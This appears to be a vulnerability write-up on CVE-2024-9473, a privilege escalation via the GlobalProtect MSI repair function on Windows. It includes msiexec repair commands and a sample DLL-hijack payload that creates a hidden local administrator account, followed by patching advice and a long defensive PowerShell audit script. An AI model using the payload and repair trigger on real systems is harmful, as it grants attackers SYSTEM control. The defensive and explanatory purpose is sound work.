Summary:
A critical privilege escalation vulnerability, tracked as CVE-2024-9473, has been discovered in Palo Alto Networks’ GlobalProtect app for Windows. This bug allows any authenticated (but non-admin) user to gain SYSTEM-level privileges on a Windows machine by abusing the MSI installer’s “Repair” functionality. This exclusive article will walk you through the technical details, how the exploit works, and how to protect your systems.

What is GlobalProtect?

GlobalProtect is Palo Alto Networks' widely used VPN client, deployed across enterprises for secure remote access. The Windows app is normally installed via an MSI package, which provides install and repair functions.

The Vulnerability

The vulnerability lies in how GlobalProtect registers its MSI installer’s "repair" functionality on Windows. Any local authenticated user—even one without admin rights—can trigger the MSI’s repair functionality. During this repair, the installer may execute commands or scripts as NT AUTHORITY\SYSTEM, opening avenues for privilege escalation.

Root Cause

When installed, many MSI packages—including GlobalProtect—register a product ID in the Windows Installer database. Regular users can call Windows Installer to “repair” an installed application, and some, like GlobalProtect’s MSI, run processes as SYSTEM without properly restricting what can be run or replaced.

A Walkthrough: How the Exploit Works

It’s surprisingly easy for an attacker with limited local access to exploit this bug. Here’s a simplified step-by-step process:

Write a malicious file:

The attacker prepares a malicious file (e.g., a reverse shell, or code for creating a new admin user), placing it in a location that the MSI’s repair process will interact with—commonly folders with weak permissions.

Find the Product Code:

Every MSI-installed application registers with a unique Product Code, which can be looked up with tools like PowerShell. With the Product Code in hand, the repair is triggered through msiexec:

```cmd
msiexec /fa {PRODUCT-CODE-HERE}
```

or, equivalently, from PowerShell:

```powershell
Start-Process "msiexec.exe" -ArgumentList "/fa {PRODUCT-CODE-HERE}" -Wait
```

The /f switch requests a repair; the repair itself is carried out by the Windows Installer service as SYSTEM.

Escalate privileges:

If the attacker’s payload is picked up during the repair process (for instance, by exploiting DLL search-order hijacking or replacing files GlobalProtect expects), their malicious code runs as SYSTEM—full admin rights.

Example Exploit (DLL Hijacking)

Suppose GlobalProtect’s MSI repair process loads a DLL from a writable folder (e.g., %TEMP%). The attacker could drop a malicious DLL:

```c
// malicious.dll - compiled as a DLL with Visual Studio
#include <Windows.h>
#include <stdlib.h>   /* system() */

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    // Runs once, when the DLL is first mapped into the (SYSTEM) repair process
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        system("net user exploituser Password123! /add");
        system("net localgroup administrators exploituser /add");
    }
    return TRUE;
}
```

After compiling the DLL, the attacker just needs it to be loaded during the repair phase. When that happens, the code adds a new local user “exploituser” to the Administrators group.

Video & References

- Palo Alto Networks Security Advisory (CVE-2024-9473)
- MITRE CVE Record
- MSI Repair Mode Explained

How to Defend

1. Update GlobalProtect:
Palo Alto Networks has released updated versions that address this issue. Patch all endpoints running GlobalProtect.

2. Restrict MSI Repair:
On sensitive systems, Group Policy can block users from invoking repairs or restrict write access to folders MSI repairs touch.

3. Monitor for Suspicious MSIExec Repair Activities:
SIEM alerting on msiexec.exe usage by non-admins can catch in-progress attacks.

4. Remove Excess Write Permissions:
Verify that installation folders, temp directories, or paths used by GlobalProtect don’t allow “Everyone” or “Users” write access.
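As an added defensive example (this script is not from the article and not Palo Alto Networks' own tooling), the following PowerShell audit covers the four points above on a single Windows endpoint: it reads the installed GlobalProtect version and MSI Product Code from the Uninstall registry keys, flags folder ACEs that grant write rights to broad groups such as Everyone or BUILTIN\Users, searches Security event 4688 for msiexec repair invocations by anything other than the SYSTEM account, and reports the Windows Installer DisableMSI policy value. Assumptions: the default install folder under Program Files, a 24-hour lookback window, and that process-creation auditing with command-line logging is enabled (without it the repair search simply returns nothing). Run it from an elevated PowerShell session.

```powershell
# Added endpoint audit for the defenses above (not from the article or from Palo Alto Networks).
# Assumptions: install path below, 24h lookback, Security 4688 with command-line logging enabled.

# 1. Installed version and MSI Product Code (for MSI installs the Uninstall key name is the Product Code)
function Get-GlobalProtectInstall {
    $paths = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
             'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    Get-ItemProperty -Path $paths -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName -like '*GlobalProtect*' } |
        Select-Object DisplayName, DisplayVersion, InstallLocation,
                      @{ Name = 'ProductCode'; Expression = { $_.PSChildName } }
}

# 4. Report ACEs that let broad groups write into the given folders
function Test-BroadWriteAccess {
    param([string[]]$Folder)
    $broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    # Specific write-type bits only (FullControl would also match pure read ACEs)
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $genericWrite = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL as seen on some inherited ACEs
    foreach ($f in $Folder | Where-Object { $_ -and (Test-Path -LiteralPath $_) }) {
        foreach ($ace in (Get-Acl -LiteralPath $f).Access) {
            $rights = [int]$ace.FileSystemRights
            if ($ace.AccessControlType -eq 'Allow' -and
                $broad -contains $ace.IdentityReference.Value -and
                ((($rights -band $writeMask) -ne 0) -or (($rights -band $genericWrite) -ne 0))) {
                [pscustomobject]@{ Folder = $f; Identity = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
            }
        }
    }
}

# 3. msiexec repair (/f with optional modifiers, e.g. /fa) started by a non-SYSTEM token.
#    The user's client msiexec is the one of interest; the service-spawned copy runs as S-1-5-18.
function Find-MsiRepairByUser {
    param([int]$Hours = 24)   # assumed lookback window
    $repairSwitch = '(^|\s)[/-]f[poedcaumsv]*(\s|$)'
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data['NewProcessName'] -like '*\msiexec.exe' -and
            $data['CommandLine'] -match $repairSwitch -and
            $data['SubjectUserSid'] -ne 'S-1-5-18') {
            [pscustomobject]@{
                Time        = $e.TimeCreated
                User        = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                CommandLine = $data['CommandLine']
            }
        }
    }
}

# 2. Windows Installer policy: DisableMSI 0/absent = always enabled, 1 = off for non-managed apps, 2 = always off
function Get-WindowsInstallerPolicy {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $v = (Get-ItemProperty -Path $key -Name DisableMSI -ErrorAction SilentlyContinue).DisableMSI
    if ($null -eq $v) { 'DisableMSI not set (Windows Installer fully enabled for all users)' } else { "DisableMSI = $v" }
}

$gp = Get-GlobalProtectInstall
$gp | Format-Table -AutoSize
# Assumed default install folder plus the temp locations the article calls out
$folders = @($gp.InstallLocation) + "$env:ProgramFiles\Palo Alto Networks\GlobalProtect" + $env:TEMP + "$env:SystemRoot\Temp"
Test-BroadWriteAccess -Folder $folders | Format-Table -AutoSize
Find-MsiRepairByUser | Format-Table -AutoSize
Get-WindowsInstallerPolicy
```

Compare the reported DisplayVersion against the fixed versions listed in the Palo Alto Networks advisory; any ACE flagged under a folder the repair touches, or any 4688 hit whose user is not SYSTEM, is the condition the article describes and warrants a closer look at that host.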

Conclusion

CVE-2024-9473 is a textbook example of how something as standard as MSI “repair” mode can be misused for privilege escalation if not hardened. As remote work and VPNs remain critical, this vulnerability underlines the importance of uninstalling or updating unsafe software versions—even if the exploit looks like it needs local access. By fixing this flaw quickly, Palo Alto Networks has secured millions of endpoints.

Stay safe. Patch your GlobalProtect clients, and never underestimate “harmless” features like “repair” mode!

Do you have more findings or want to share your story? Comment below or reach out to our team.


Timeline

Published on: 10/09/2024 17:15:21 UTC
Last modified on: 10/18/2024 11:59:17 UTC